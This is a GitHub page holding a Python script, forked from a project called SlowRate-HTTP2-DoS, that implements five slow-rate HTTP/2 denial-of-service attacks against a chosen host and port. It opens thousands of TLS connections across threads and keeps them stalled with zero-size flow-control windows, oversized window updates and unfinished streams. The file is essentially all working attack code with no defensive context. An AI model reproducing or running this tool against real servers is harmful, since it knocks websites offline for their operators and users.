forked from Dhiver/SlowRate-HTTP2-DoS
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathslowh2attacks-alpha.py
151 lines (132 loc) · 4.23 KB
/
slowh2attacks-alpha.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/env python3
import socket, ssl, logging,time,sys, argparse,threading
import h2.connection
from h2.config import H2Configuration
from hyperframe.frame import SettingsFrame, WindowUpdateFrame, HeadersFrame
from hpack.hpack_compat import Encoder
PREAMBLE = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'
WINDOW_INCREMENT_SIZE = 1073676289 # value used by curl measured during tests
def get_http2_ssl_context():
ctx = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.options |= ssl.OP_NO_COMPRESSION
ctx.options |= (
ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 | ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
)
ctx.set_alpn_protocols(["h2"])
return ctx
def negotiate_tls(tcp_conn, context):
tls_conn = context.wrap_socket(tcp_conn, server_hostname=args.target)
negotiated_protocol = tls_conn.selected_alpn_protocol()
if negotiated_protocol != "h2":
raise RuntimeError("Didn't negotiate HTTP/2!")
return tls_conn
def attack1(tls_conn, h2_conn):
h2_conn._data_to_send += PREAMBLE
h2_conn.update_settings({SettingsFrame.INITIAL_WINDOW_SIZE: 0})
tls_conn.sendall(h2_conn.data_to_send())
headers = [
(':authority', args.target),
(':path', '/'),
(':scheme', 'https'),
(':method', 'GET'),
]
h2_conn.send_headers(1, headers, end_stream=True)
tls_conn.sendall(h2_conn.data_to_send())
def attack2(tls_conn, h2_conn):
h2_conn.initiate_connection()
wf = WindowUpdateFrame(0)
wf.window_increment = WINDOW_INCREMENT_SIZE
h2_conn._data_to_send += wf.serialize()
tls_conn.sendall(h2_conn.data_to_send())
headers = [
(':authority', args.target),
(':path', '/'),
(':scheme', 'https'),
(':method', 'POST'),
]
hf = HeadersFrame(1)
hf.flags.add('END_HEADERS')
e = Encoder()
hf.data = hf.data = e.encode(headers)
h2_conn._data_to_send += hf.serialize()
tls_conn.sendall(h2_conn.data_to_send())
def attack3(tls_conn, h2_conn):
h2_conn._data_to_send += PREAMBLE
tls_conn.sendall(h2_conn.data_to_send())
def attack4(tls_conn, h2_conn):
h2_conn.initiate_connection()
wf = WindowUpdateFrame(0)
wf.window_increment = WINDOW_INCREMENT_SIZE
h2_conn._data_to_send += wf.serialize()
tls_conn.sendall(h2_conn.data_to_send())
headers = [
(':authority', args.target),
(':path', '/'),
(':scheme', 'https'),
(':method', 'GET'),
]
hf = HeadersFrame(1)
hf.flags.add('END_STREAM')
e = Encoder()
hf.data = hf.data = e.encode(headers)
h2_conn._data_to_send += hf.serialize()
tls_conn.sendall(h2_conn.data_to_send())
def attack5(tls_conn, h2_conn):
h2_conn.initiate_connection()
wf = WindowUpdateFrame(0)
wf.window_increment = WINDOW_INCREMENT_SIZE
h2_conn._data_to_send += wf.serialize()
tls_conn.sendall(h2_conn.data_to_send())
headers = [
(':authority', args.target),
(':path', '/'),
(':scheme', 'https'),
(':method', 'GET'),
]
h2_conn.send_headers(1, headers, end_stream=True)
tls_conn.sendall(h2_conn.data_to_send())
l = logging.Logger(name='test')
ol = logging.StreamHandler(sys.stdout)
ol.setLevel(logging.DEBUG)
l.addHandler(ol)
parser = argparse.ArgumentParser()
parser.add_argument("attackn", help="specify the attack number", type=int, choices=range(1, 6))
parser.add_argument("target", help="specify the hostname or IP of the target", type=str)
parser.add_argument("port", help="target port", type=int)
args = parser.parse_args()
args.attackn-=1
attacks = (attack1, attack2, attack3, attack4, attack5)
# ./h2attack <attack nb> <target IP> <port>
context = get_http2_ssl_context()
def main():
conn = socket.create_connection((args.target, args.port))
tls_conn = negotiate_tls(conn, context)
config = H2Configuration(logger=0)
h2_conn = h2.connection.H2Connection(config=config)
attacks[args.attackn](tls_conn, h2_conn)
return tls_conn
def keep(c):
data=c.recv(1)
if not data:
group.remove(c)
def start1():
group=[]
for a in range(500):
group.append(main())
while True:
map(keep,group)
for c in range(500-len(group)):
try:
group.append(main())
except:
break
time.sleep(0.001)
list=[]
for i in range(10):
t1=threading.Thread(target=start1)
t1.start()
list.append(t1)
time.sleep(0.01)
map(lambda x:x.join(),list)